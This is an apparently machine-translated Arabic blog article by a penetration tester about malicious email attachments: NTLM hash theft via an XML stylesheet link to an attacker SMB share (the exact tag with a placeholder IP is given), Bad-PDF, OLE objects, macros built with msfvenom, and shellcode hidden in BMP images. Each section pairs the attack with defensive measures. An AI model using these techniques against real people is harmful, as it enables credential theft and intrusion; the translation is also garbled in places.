لا يمكن تجاهل فتح

يرتبط عملي بحقيقة أنني أكذب على الناس وأستغل بريقهم وفضولهم وجشعهم وما إلى ذلك. أحب عملي وأحاول الاقتراب منه بطريقة خلاقة. ترتبط تفاصيل نشاطي بتنفيذ الهجمات بطريقة الهندسة الاجتماعية. وأود في هذا المنشور أن أتحدث عن المرفقات الخبيثة.

إذا وقع ملف PDF في بريدك ، فهل ستفتحه؟ وملف Word؟ هل ستفتح الصورة من مصدر غير معروف؟ هل من الممكن أن تواجه مشاكل إذا قمت بتنزيل الأرشيف؟ إلى أي مدى تعرف أي الاستثمارات تعتبر خطرة وأيها ليست كذلك؟ ماذا عن زملائك؟

لقد جربت طرقًا مختلفة تمامًا لتسليم الحمولة للمستخدم لعدة عشرات من المشاريع. كان بعضها فعالًا جدًا ، وتم اكتشاف البعض بسهولة - لكل منها سلبياته وإيجابياته. لن أبدأ في إخبار كيفية حزم الملفات القابلة للتنفيذ بالملحق exe. في الأرشيف. مع مثل هذا النهج القديم ، فإن اختراق أنظمة الأمان ، ثم جعل المستخدم يبدأ المرفق ، يعد أكثر تكلفة. سأخبرك عن الملفات التي يحتمل أن تكون خطيرة والتي يمكن تلقيها بالفعل عن طريق البريد (أو إرسالها) اليوم.

تنويه: كل ما يلي لأغراض إعلامية فقط. يصف المؤلف الخبرة المكتسبة أثناء المكبوتة ، وهو غير مسؤول عن تكرار هذه الهجمات ويشجع على عدم استخدام المواد لأغراض غير قانونية.

XML

جوهر الطريقة

تعتمد معظم ملفات Office على Microsoft Office Open XML (OOXML) ، وهو في الأساس تنسيق XML مضغوط تم تطويره بواسطة Microsoft لتقديم الجداول والرسوم البيانية والعروض التقديمية وما إلى ذلك. يتم عرض مشاركة XML في امتداد الوثيقة (docx ، xlsx ، pptx). من الغريب جدًا أن مستندات Office هذه يمكن فتحها كملف نصي عادي مع جميع العلامات والسمات. يمكن حفظ أي ملف XML لـ Office Open بتنسيق XML وإجراء تغييرات على العلامات. على سبيل المثال ، قم بإضافة ارتباط إلى مجلد عمومي يتحكم فيه مهاجم. عند تشغيل ملف XML ، يحاول الاتصال بمجلد عام مفتوح. عند محاولة الاتصال عبر بروتوكول smb ، يوفر نظام التشغيل Windows تجزئة NTLM (NTLMv2) وتسجيل دخول المستخدم إلى المهاجم.



التنفيذ باختصار

لتطبيق المتجه ، تحتاج إلى إنشاء مستند Office Open XML (docx ، pptx ، xlsx ، إلخ.) ، وحفظه بتنسيق XML. افتح XML وقم بإجراء التغييرات التالية:

<?xml-stylesheet type="text/xsl" href="\\xxx.xxx.xxx.xxx \test\swordfish.xsl ">

في العلامة المحددة ، يجب تحديد عنوان مجلد الشبكة العامة الذي ستتصل به الضحية.

ملاحظة : بدلاً من ="\\xxx.xxx.xxx.xxx\test\swordfish.xsl يمكنك كتابة file:/// xxx.xxx.xxx.xxx/test/swordfish.xsl . بعد ذلك ، يجب حفظ الملف وإرساله إلى الضحية.

يمكن العثور على معلومات حول الهجوم هنا .

ملاحظة : بناءً على نظام التشغيل والإعدادات ، قد يضطر المستخدم إلى الموافقة على شروط أو تعليقات إضافية ، على سبيل المثال:



مقالة ستكون غير مكتملة بدون نصيحة حماية:

• استخدم سياسة كلمة مرور معقدة.
• استخدم NTLMv2.
• رفض حركة المرور الخارجية عبر smb (tcp 139/445).

Bad-pdf

جوهر الطريقة

تتم إضافة علامة إلى ملف PDF برابط إلى خادم smb عام يتحكم فيه المهاجم. كما في المثال أعلاه ، عند فتح ملف ، يرسل نظام التشغيل تجزئة NTLM (NTLMv2) للاتصال بالمجلد العام.

التنفيذ باختصار

تنفيذ هذا الهجوم أسهل بكثير من الهجوم السابق. لسرقة التجزئة بنجاح ، ما عليك سوى تنزيل الأداة (git clone هنا أو هنا ) وإعطاء الحق في تنفيذ (chmod + x) ملف python. بعد ذلك ، قم بتشغيل البرنامج النصي python وأدخل عنوان IP واسم الملف والواجهة ، كما في الشكل أدناه.


إنشاء ملف حمولة.

يمكن إرسال الملف المستلم إلى البريد تحت غطاء التهنئة ووثيقة للتوقيع ومسح للتطبيق وما إلى ذلك. عندما يبدأ الملف ، سيتم إرسال جميع التجزئة إلى المهاجم.



الحماية

• استخدم سياسة كلمة مرور معقدة.
• استخدم NTLMv2.
• رفض حركة المرور الخارجية عبر smb (tcp 139/445).

كائن OLE

جوهر الطريقة

في مستند Office شرعي ، يتم تضمين برنامج نصي يتم تشغيله عن طريق النقر. يمكن أن يكون البرنامج النصي على الإطلاق ، وعادة ما يكون مجرد حمولة. يحتوي على رمز خاص به ، والذي يمكن تغييره ، اعتمادًا على رغبات المهاجم ، حتى نسخة كاملة من نمط مستندات Office التي تحاكي رسائل الخطأ. على عكس وحدات الماكرو ، فإن الملف الذي يحتوي على مرفق OLE ليس مريبًا للمستخدمين العاديين.


التنفيذ باختصار

للاستعداد لهذا الهجوم ، يجب أن تبذل المزيد من الجهد (مقارنة بتلك المذكورة أعلاه). الخطوة الأولى هي إنشاء حمولة. بعد ذلك ، تحتاج إلى بدء الخادم ، والذي سيتلقى اتصالات من الحمولة ، ثم إنشاء مستند Word ، وتحويله إلى RTF وإضافة ارتباط إلى الحمولة. إذا لفترة وجيزة.
يمكن العثور على معلومات حول الهجوم هنا .

الحماية

للحماية من مثل هذه الهجمات ، نوصي بإجراء تغييرات التسجيل التالية:

HKCUSoftwareMicrosoftOffice -> Office Version -> Office application -> SecurityPackagerPrompt

قد تكون قيمة Office Version 16.0 (Office 2016) ؛ 15.0 (Office 2013) ؛ 14.0 (Office 2010) ؛ أو 12.0 (Office 2007). قيمة Office application هي اسم تطبيق Office معين ، أي Word و Excel وما إلى ذلك.

يجب أن تكون قيمة مفتاح التسجيل هذا "2" ، والتي تعني "لا يوجد موجه ، لا يتم تنفيذ الكائن" أو حظر فعلي على تنفيذ الكائنات. تسمح القيمة "1" للمستخدم بـ "المطالبة من Office عند نقر المستخدم ، وتنفيذ الكائن" ، أي النقر فوق الكائنات ، ويعرض Office الرسالة المقابلة. القيمة "0" ، بدورها ، تعني "لا يوجد موجه من Office عندما ينقر المستخدم ، ينفذ الكائن" ، بمعنى آخر ، يتم تنفيذ الكائنات ، لكن المستخدم لا يتلقى أي رسائل من Office.

يمكن إجراء التغييرات إذا لم يتم استخدام هذه الوظائف في العمليات التجارية لشركتك.

وحدات الماكرو

منذ ذكر OLE ، كيف لا يمكنني ذكر وحدات الماكرو؟



جوهر الطريقة

الماكرو - مجموعة من الأوامر المصممة لتبسيط عمل المستخدم. من المحتمل ، يمكنك كتابة أي مجموعة من الأوامر على الإطلاق في الماكرو وبالتالي الحصول على حمولة. لإنشاء مستند باستخدام ماكرو ، يحتاج المهاجم فقط إلى التعتيم على رمز الحمولة وإضافة الرمز إلى ماكرو المستند.

التنفيذ باختصار

هناك طرق عديدة رائعة لإنشاء ماكرو في الوقت الحالي. يمكنك استخدام أداة Luckystrike أو التوقف عند Metasploit المألوف. يمكنك استخدام msfvenom وإخفاء الماكرو بعد الجيل. عند إنشاء الماكرو ، كل ما عليك فعله هو إضافته إلى مستند Office. ولكن على عكس مرفق OLE ، فأنت تحتاج حقًا إلى الكثير من الجهد لتشغيل الماكرو. في الوقت الحالي ، يقوم عدد قليل جدًا من المستخدمين بتشغيل وحدات الماكرو. لقد تعلم Windows بالفعل التحذير من وحدات الماكرو المشبوهة ، وكان هناك الكثير من الحديث عن خطرها.

الحماية

للحصول على الموثوقية ، أوصي بتعطيل تنفيذ الماكرو دون إشعار.

BMP

من غير المحتمل أن تواجه مرفق BMP برمز قشرة ، لذا كن على دراية: هناك مثل هذا.

جوهر الطريقة

يتم تضمين كود القشرة في الصورة بتنسيق BMP. الصورة نفسها ليست خطيرة وقت الاكتشاف. لا يتعلق الأمر بالسماح لمهاجم بجلسة. الصورة مطلوبة للكذب والانتظار لمدة ساعة عندما يقوم المهاجم بتنشيطها باستخدام الأمر Powershell. هذه الطريقة ليست هجومًا بقدر ما هي تجاوز لأدوات مكافحة الفيروسات وكشف التسلل.

التنفيذ باختصار

لإنشاء صورة ، ما عليك سوى استخدام هذا المستودع . يوفر DKMC كل شيء بدءًا من توليد الصور إلى التعتيم البرمجي. أريد أيضًا أن أشير إلى أن الصورة "المصابة" ستحتوي على بكسل غريب متعدد الألوان. يمكن إصلاح ذلك بسهولة إذا قمت بقص المنطقة المرئية من الصورة بمقدار 5-10 بكسل.

بعد إنشاء الصورة ، يجب تسليم الملف إلى الضحية وانتظر المناسبة المناسبة أو ابحث عن فرصة لتشغيل البرنامج النصي powerhell.

الحماية

تصفية كل ملف bmp كخطورة محتملة غير فعالة. يمكنك استخدام المحولات وحفظ الصور بتنسيقات أخرى ، أو فحص الملفات على أجهزة الكمبيوتر ، أو قبول حقيقة أنه إذا تمكن مهاجم من استخدام البرنامج النصي powerhell على كمبيوتر الموظف ، فإن وجود صورة برمز shell ليس مشكلة الأمان الرئيسية.

هذا ، في الواقع ، كل شيء. آمل أن تكون هذه المقالة قد وسعت فهمك للاستثمارات والأخطار التي قد تحملها. سنتحدث عن الروابط المشبوهة بعد ذلك بقليل.



إيكاترينا رودايا (كاترين) ، الخبيرة في مختبر التحليل الأمني ​​العملي ، الأنظمة النفاثة النفاثة